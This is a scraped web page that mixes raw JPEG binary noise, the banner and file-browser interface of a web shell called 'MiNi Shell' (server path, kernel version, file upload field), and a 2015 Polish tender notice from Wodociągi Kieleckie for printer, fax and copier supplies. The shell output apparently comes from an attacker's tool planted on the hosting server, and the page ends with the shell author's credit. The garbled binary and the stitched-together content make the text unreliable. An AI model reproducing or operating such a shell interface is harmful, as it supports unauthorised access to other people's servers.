JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150409/79470-N-2015.html

<p class="kh_header"><b>Kielce: Sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych do drukarek , faksów i kserokopiarek.</b><br>
<b>Numer ogłoszenia: 79470 - 2015; data zamieszczenia: 09.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych do drukarek , faksów i kserokopiarek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych do drukarek, faksów i kserokopiarek.
Postępowanie prowadzone jest w częściach:- Część I - Tusze, tonery do drukarek i faksów, atramenty, bębny, taśmy barwiące do drukarek.- Część II	- Tonery i bębny do kserokopiarek.
2. Szczegółowy opis przedmiotu zamówienia zawarty został w Załączniku nr 1 do SIWZ.
3. UWAGI:
3.1. Materiały eksploatacyjne z Części  I, II muszą mieć parametry takie lub lepsze niż produkty wymienione w kolumnie 4 Załącznika nr 1 do SIWZ .
3.2. Zamawiający dopuszcza zaoferowanie materiałów równoważnych pod warunkiem, że będą to materiały o parametrach techniczno - jakościowych takich lub lepszych niż parametry materiałów oryginalnych pochodzących od producenta sprzętu do którego są przeznaczone.
3.3.Wszystkie oferowane materiały eksploatacyjne muszą być oryginalne i fabrycznie nowe. Przez produkty oryginalne i fabrycznie nowe rozumie się produkty nowo wytworzone w całości tzn. nowa obudowa, nowe dysze, nowy tusz, nowe bębny światłoczułe, nowe oryginalne opakowanie, stosowane typowo dla nowego produktu przez jego producenta. 
3.4. Zamawiający wymaga, aby przedmiot zamówienia opakowany był w oryginalne opakowania producenta zaopatrzone w etykiety identyfikujące dany produkt (nazwa producenta, numer katalogowy, symbol i termin jego ważności - odpowiednio do wymagań dla danego rodzaju materiału) zarówno na jednostkowym opakowaniu fabrycznym, jak i na samym materiale eksploatacyjnym opakowanym w wewnętrzne szczelne i hermetyczne opakowanie zabezpieczające przed kontaktem zewnętrznym.Za produkt fabrycznie nowy (nowo wytworzony w całości) i nie regenerowany nie uznaje się wyrobu eksploatowanego wcześniej, przerabianego, gdzie jedynie wyczyszczony został pojemnik i ponownie napełniony, czy uzupełniony lub wykonany z zastosowaniem używanych elementów.
3.5.Przez produkty równoważne Zamawiający rozumie produkty charakteryzujące się pełną kompatybilnością z urządzeniami, w których mają być użytkowane jako materiały eksploatacyjne, 
a także posiadające nie gorsze niż produkt oryginalny parametry w zakresie jakości, pojemności 
i wydajności (przedstawione w kolumnie 4 Załącznika nr 1 do SIWZ). 
3.6. Zamawiający w celu stwierdzenia równoważności oferowanych produktów wymaga, aby Wykonawca składający ofertę na produkty równoważne załączył do oferty opis produktów równoważnych (kartę katalogową produktu) potwierdzające spełnianie wymagań określonych przez Zamawiającego.
3.7. Dokument potwierdzający, że oferowane produkty równoważne odpowiadają wymaganiom Zamawiającego i są równoważne w stosunku do produktu oryginalnego musi być wydany przez podmiot uprawniony do kontroli jakości oferowanych produktów równoważnych lub producenta oferowanych produktów równoważnych. Dokument musi wskazywać producenta i symbol produktu w stosunku do którego oferowany produkt spełnia warunek równoważności oraz parametry tego produktu równoważnego. Stwierdzenie równoważności nastąpi poprzez porównanie przez Zamawiającego treści specyfikacji wyrobu oryginalnego (w szczególności wymienionych 
w kolumnie 4 Załącznika nr 1 do SIWZ) z treścią dokumentów dostarczonych przez Wykonawcę. Z porównania treści dokumentów musi bezsprzecznie wynikać, że konkretny produkt równoważny posiada parametry nie gorsze niż produkt oryginalny w szczególności w zakresie pojemności, wydajności określonej liczbą stron formatu A4 oraz wartości procentowej zaczernienia określonej w specyfikacji produktu oryginalnego (wymienionych w kolumnie 4 Załącznika nr 1 do SIWZ).
3.8. Wykonawca składając ofertę na równoważne materiały bierze na siebie pełną odpowiedzialność za uszkodzenie sprzętu spowodowane używaniem zaoferowanych materiałów.
3.9. Na Wykonawcy spoczywa obowiązek udowodnienia, iż zaoferowane materiały eksploatacyjne są równoważne w stosunku do produktów określonych przez Zamawiającego. 
3.10.W trakcie realizacji umowy Wykonawca nie może dostarczać Zamawiającemu wyrobów równoważnych innego producenta, niż wskazany w ofercie. 
3.11.Dopuszczalne jest zastąpienie produktów równoważnych produktem pochodzącym od producenta sprzętu do którego jest przeznaczony, pod warunkiem zachowania niezmiennej ceny 
w stosunku do ceny wskazanej w ofercie. W przypadku, gdy produkt oryginalny posiada układ elektroniczny (chip) przekazujący informacje o stanie zużycia tuszu lub tonera, oferowany materiał równoważny musi posiadać analogiczny układ, tak samo działający.
3.12.Wykonawca poda w Załączniku nr 2 do SIWZ nazwę producenta oraz symbol oferowanego materiału eksploatacyjnego do drukarek, kserokopiarek i faksów oraz jego pojemność i wydajność. 
3.13.Wymaga się, aby produkt współpracował z urządzeniami wymienionymi w kolumnie 2 Załącznika nr 1 do SIWZ i odpowiadał co najmniej pojemności i wydajności wymienionej w kolumnie 4, mierzonym zgodnie z normą ISO/IEC 19752 lub ISO/IEC 24711, ponadto proces produkcji oferowanego produktu powinien być zgodny z normami ISO 9001 i ISO 14001, bez elementów składowych odzyskanych w wyniku refabrykacji lub regeneracji
z wcześniej użytkowanego materiału eksploatacyjnego.
3.14. Zaoferowane przez Wykonawcę materiały eksploatacyjne do poniższych urządzeń będących na gwarancji:- drukarek:
Brother HL-4150CDN  (poz.49-54 tab. - zał. nr 1)
Brother HL-5450DN   (poz.59-60 tab. - zał. nr 1)
HP OfficeJet 8100  (poz.61-64 tab. - zał. nr 1)
Brother HL-L8250CDN  (poz.77-80 tab. - zał. nr 1) -urządzeń  wielofunkcyjnych:
Brother MFC-J470DW  (poz.73-76 tab. - zał. nr 1) 
Brother DCP-J4110DW  (poz.85-88 tab. - zał. nr 1)
Brother MFC-J6520DW  (poz.85-88 tab. - zał. nr 1)
Brother DCP-J315W  (poz.69-72 tab. - zał. nr 1)
Brother MFC-J6510DW  (poz.65-68 tab. - zał. nr 1)nie mogą powodować utraty gwarancji producenta tych urządzeń.W przypadku uszkodzenia urządzenia spowodowanego przez dostarczony materiał eksploatacyjny równoważny, a uszkodzenie nastąpiło w trakcie okresu gwarancyjnego producenta sprzętu i nastąpiła utrata uprawnień gwarancyjnych, Wykonawca zobowiązany będzie do wymiany urządzenia na nowe oraz zwrotu kosztów jakie Zamawiający poniósł w związku z wysłaniem urządzenia do serwisu, w ciągu 3 dni od daty zgłoszenia.
Podstawą do wystąpienia z roszczeniami jak powyżej w stosunku do Wykonawcy będzie protokół stwierdzenia szkody sporządzony przez autoryzowany serwis gwaranta urządzeń oraz faktura wystawiona za naprawę.
W przypadku uszkodzenia urządzenia spowodowanego przez dostarczony materiał eksploatacyjny równoważny, a uszkodzenie nastąpiło po upływie okresu gwarancyjnego producenta sprzętu, Wykonawca zobowiązany będzie do zwrotu kosztów naprawy urządzenia w ciągu 3 dni od daty zgłoszenia.
Podstawą do wystąpienia z roszczeniami jak powyżej w stosunku do Wykonawcy będzie protokół stwierdzenia szkody sporządzony przez serwis oraz faktura wystawiona za naprawę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.00-2, 30.19.21.12-9, 30.19.23.00-4, 30.12.51.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Informacja na temat wadium (jeżeli dotyczy): Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 2 000,00 zł (słownie: dwa  tysiące złotych 00/100) dla części I - przed upływem terminu składania ofert. Dla części II wadium nie jest wymagane.2. Wadium może  być wnoszone: w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej  z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. 2007 Nr 42 poz. 275 z późniejszymi zmianami). 
3. Wadium wnoszone w formie pieniężnej w PLN należy wpłacać przelewem na konto  Spółki z o.o. Wodociągi Kieleckie - nr 79 1030 1162 0000 0000 0508 0201.	
4. Za skutecznie wniesione wadium w pieniądzu Zamawiający uzna wadium, które przed upływem terminu składania ofert znajduje się na rachunku Zamawiającego.5.Wykonawca, którego oferty nie zabezpieczono wymaganą kwotą wadium, zostanie z postępowania wykluczony,  a jego ofertę uznaje się za  odrzuconą.
6. W przypadku wniesienia wadium w innej formie niż pieniężnej, oryginał dokumentu gwarancyjnego musi być złożony w Biurze Obsługi Klienta  Spółki, przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie spełnienia warunku 1.2. wymaga, aby Wykonawca w okresie ostatnich 3 lat (przed upływem terminu składania ofert), a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie  - należycie wykonał   minimum 2 zamówienia o porównywalnym charakterze i zakresie, tj. polegających na dostawie materiałów eksploatacyjnych do drukarek, faksów 
i kserokopiarek o wartości nie mniejszej niż 100 000,00 zł brutto  każda wraz z załączeniem dowodów potwierdzających, że te dostawy zostały wykonane należycie.
W celu potwierdzenia spełnienia tego warunku Zamawiający żąda złożenia wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw (przez dostawę główną Zamawiający rozumie dostawy materiałów eksploatacyjnych do drukarek, faksów i kserokopiarek o łącznej wartości   nie mniejszej niż 100 000 zł, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, wartości, dat wykonania i odbiorców (Załącznik nr 7 do SIWZ) oraz załączonych  dowodów, czy zostały wykonane lub są wykonywane należycie.
Dowodami, o których  jest mowa powyżej są:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw  lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie Wykonawcy  (w przypadku zamówień na dostawy lub usługi) - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa powyżej.
W przypadku, kiedy Zamawiający jest podmiotem na rzecz którego dostawy lub usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których jest mowa powyżej.
W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa powyżej budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy lub  usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. 
Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy o spełnieniu warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz cenowy; załącznik nr 1a do SIWZ.
2. Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej.
3.Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru albo gdy oferty nie podpisuje Wykonawca.
4.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i/lub zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Termin dostawy predmiotu umowy - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy w przypadku ustawowej zmiany stawki podatku VAT od towarów i usług; strony dopuszczają zmianę wynagrodzenia o kwotę wynikającą ze zmiany podatku VAT naliczonego od wartości netto części przedmiotu umowy niezrealizowanej przez Wykonawcę z przyczyn przez niego niezawinionych w dacie zmiany stawki podatku.
2.W uzasadnionych przypadkach dotyczących:  wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, Zamawiający przewiduje możliwość zmiany umowy w zakresie oferowanego asortymentu z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt z gwarancją zachowania oferowanej ceny.3.Dopuszcza się możliwość przedłużenia terminu realizacji umowy określonego w pkt.1 rozdz. IV SIWZ (w drodze aneksu) - w przypadku, gdy ilość i/lub kwota brutto przeznaczona na zakup przedmiotu zamówienia w poszczególnych częściach zostaną niezrealizowane.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wod-kiel.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. Biuro Obsługi Klienta, ul. Krakowska 64 
25-701 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2015 godzina 12:45, miejsce: Wodociągi Kieleckie Sp. z o.o.  Biuro Obsługi Klienta ul. Krakowska 64, 25-701 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wartość zamówienia poniżej kwoty określonej w art. 4 pkt. 8 pzp. 
Ogłoszenie zamieszczone jako nieobowiązkowe w BZP..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tusze, tonery do drukarek i faksów, atramenty, bębny, taśmy barwiące do drukarek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych do drukarek i faksów.Szczegółowy opis przedmiotu zamówienia zawarty został w Załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.19.21.13-6, 30.19.21.12-9, 30.19.23.00-4, 30.12.51.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Termin dostawy predmiotu umowy - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tonery i bębny do kserokopiarek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych do kserokopiarek.Szczegółowy opis przedmiotu zamówienia zawarty został w Załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Termin dostawy przedmiotu umowy - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com